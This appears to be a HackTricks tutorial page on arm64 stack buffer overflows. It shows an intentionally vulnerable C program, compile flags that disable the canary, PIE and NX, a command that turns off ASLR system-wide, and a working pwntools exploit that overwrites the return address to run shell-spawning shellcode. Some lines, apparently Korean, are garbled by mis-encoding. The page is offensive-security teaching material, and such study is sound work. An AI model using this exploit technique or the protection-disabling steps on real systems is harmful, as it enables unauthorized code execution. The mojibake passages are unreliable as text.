Stack Shellcode - arm64

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

An introduction to arm64 can be found at:

Introduction to ARM64v8

Linux

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability: up to 256 bytes into a 64-byte buffer
}

int main() {
    vulnerable_function();
    return 0;
}

Compile without PIE, canary and NX (the stack must be executable for the shellcode to run):

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

ASLR ์—†์Œ & canary ์—†์Œ - Stack Overflow

To disable ASLR system-wide run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

bof์˜ offset์„ ํ™•์ธํ•˜๋ ค๋ฉด ์ด ๋งํฌ๋ฅผ ํ™•์ธํ•˜์„ธ์š”.

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset from the start of buffer to the saved return address (x30):
# 64 bytes of buffer + 8 bytes of saved frame pointer (x29)
offset = 72

# Stack address of the byte right after the overwritten return address,
# i.e. where the shellcode lands (found with gdb / the core dump, see below)
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

The only "complex" thing to find here is the stack address to return into. In my case I generated the exploit with the address found in gdb, but when I ran it for real it didn't work (because the stack address had changed a bit). The environment variables and argv[0] that a process sees under gdb are not the same as in a bare run, so everything on the stack moves by some bytes.

So I opened the generated core file (gdb ./bof ./core) and checked the real address where the shellcode started. Core dumps have to be enabled first (ulimit -c unlimited), and the file name depends on /proc/sys/kernel/core_pattern.

macOS

Tip

macOS์—์„œ๋Š” NX๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค. arm64์—์„œ๋Š” ์ด ๋ชจ๋“œ๊ฐ€ ํ•˜๋“œ์›จ์–ด ์ˆ˜์ค€์—์„œ ๊ตฌํ˜„๋˜์–ด ์žˆ์–ด ๋น„ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์—†์œผ๋ฏ€๋กœ macOS์—์„œ๋Š” stack์— shellcode๊ฐ€ ์žˆ๋Š” ์˜ˆ์ œ๋ฅผ ์ฐพ๊ธฐ ์–ด๋ ต์Šต๋‹ˆ๋‹ค.

๋‹ค์Œ์—์„œ macOS ret2win ์˜ˆ์ œ๋ฅผ ํ™•์ธํ•˜์„ธ์š”:

Ret2win - arm64
